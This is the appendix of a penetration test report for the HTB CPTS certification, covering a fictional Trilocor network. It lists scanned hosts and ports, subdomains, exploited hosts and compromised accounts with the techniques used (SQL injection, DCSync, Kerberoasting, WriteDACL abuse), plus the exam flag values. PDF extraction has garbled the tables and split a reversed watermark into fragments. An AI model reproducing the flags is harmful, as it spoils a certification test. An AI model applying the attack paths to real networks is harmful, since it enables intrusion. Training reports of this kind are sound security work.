
172.16.139.3 88

172.16.139.35 139,2024,4848,8080

172.16.139.175

172.16.210.5 88,139,445

172.16.210.21 8080

172.16.210.34 8084,873

s
m
xa
re
be
cy
e/
.m
//t
s:
tp
ht

CONFIDENTIAL HTB CPTS 63

 HACKTHEBOX

A.3 Subdomain Discovery

URL Description Discovery
Method
www.trilocor.local Trilocor
main page
blog.trilocor.local Blog Zone
Tranfering
careers.trilocor.local Trilocor - Job Zone
Portal Tranfering
dev.trilocor.local UAT Zone
Tranfering
portal.trilocor.local Human Zone
Resources Tranfering
login

s
pr.trilocor.local Trilocor Zone

m
Public Tranfering
Relations

xa
remote.trilocor.local re VPN Zone
Tranfering
store.trilocor.local TRILOCOR Zone
be
Shop Tranfering
securetransfer-dev.trilocor.local UAT Directory
cy

Fuzzing
e/

osticketapp.trilocor.local UAT souce code

.m

gogsusdev01.trilocor.local UAT ticket

generation
//t

uat01-eu.intranet.trilocor.local UAT from

repositories
s:
tp
ht

CONFIDENTIAL HTB CPTS 64

 HACKTHEBOX

A.4 Exploited Hosts

Host Scope Method Notes

WEB-NIX01 Public Facing Sqli

MS01 Internal linux PRIVILEGES

WS01 Inernal ACL Abuse

DC01 Internal Domain Controller DCSNYC

DC02 Internal AD Cross Forest cross forest Kerberoast attack

ADMIN01 Internal AD Conneted web

BACKUP01 linux

s
m
xa
re
be
cy
e/
.m
//t
s:
tp
ht

CONFIDENTIAL HTB CPTS 65

 HACKTHEBOX

A.5 Compromised Users

Username Type Method Notes

www-data linux SQLi

websvc linux vulnerbale api

srvadm linux Werkzerg

root linux DOcker

MS01\svc_glassfish windoes glassfish server

MS01\Administrator windows hash dump

MS01\pthorp_adm windows session hijack

WS01\devtest windows sticky note

s
m
WS01\administrator windows wondershare

xa
troilocor\PTHORPE active Direcorty clear text password

troilocor\JFLEMMING active Direcorty

re
Phishing Using open share
be
troilocor\KSALINAS active Direcorty kerberoast attack

troilocor\SVC_TRILOCORSYNC active Direcorty weak passwoerd for Psafe3 file

cy

troilocor\ADMINISTRATOR active Direcorty WriteDACL Abuse

e/

troilocorai\svc_datakeeper active Direcorty Domain trust

.m

troilocorai\svc_veracrypt active Direcorty event log

//t

troilocorai\administrator active Direcorty privilenge

s:

ADMIN01\administrator windows Command execution

tp

A.6 Changes/Host Cleanup

ht

Host Scope Change/Cleanup Needed

ADMIN01\administrator ADMIN01 Password changed
MS01\pthorp_adm MS01 password changed

CONFIDENTIAL HTB CPTS 66

 HACKTHEBOX

A.7 Flags Discovered

Flag Flag
Host Flag Value Method Used
# Location
c8601dccf9 67e21d845ce5279a2eb870fca17
1. /home SQLI
70 87afe
35c306ef686049266dd53065ba0 /home/
2. WEB-NIX01 API
dcb96 websvc
43f40c9c680bb5ac7cfbdcce3136 /home/
3. WEB-NIX01 Werkzerg
ae5f srvadm
83dadb7c6d53508d02b089efc31
4. WEB-NIX01 /root Docker
82167
0b934e5f65ace7c003a75e86982
5. MS01 Desktop glassfish serever
01800

s
775e8603841fe0ca6447e7a4f6ec

m
6. MS01 Desktop SeLoadDriverPrivilege
23ed

xa
e70a024080d44f7ae2bb68c0ede
7. WS01 Desktop session Hijacking
033f9 re
54db41fea7f42a7a35dd3500911 weak password for
8. WS01 Desktop
be
74bd9 psafe3 file
f8e8731142c94e63ea6aac49b5a
cy

9. DC01 Desktop dcsync

d359b
e/

eb50b7f93b26874c5b66294f177
10. DC02 Desktop cross forest trust
71523
.m

25d36e1585c43ed40fe6a1b8f411
11. DC02 desktop privileges
1dbf
//t

2d06668165cc471db7a415b7bad
s:

12. ADMIN01 Desktop web exploitatiom

d1aaa
tp

End of Report
ht

This report was rendered

by SysReptor with
♥

CONFIDENTIAL HTB CPTS 67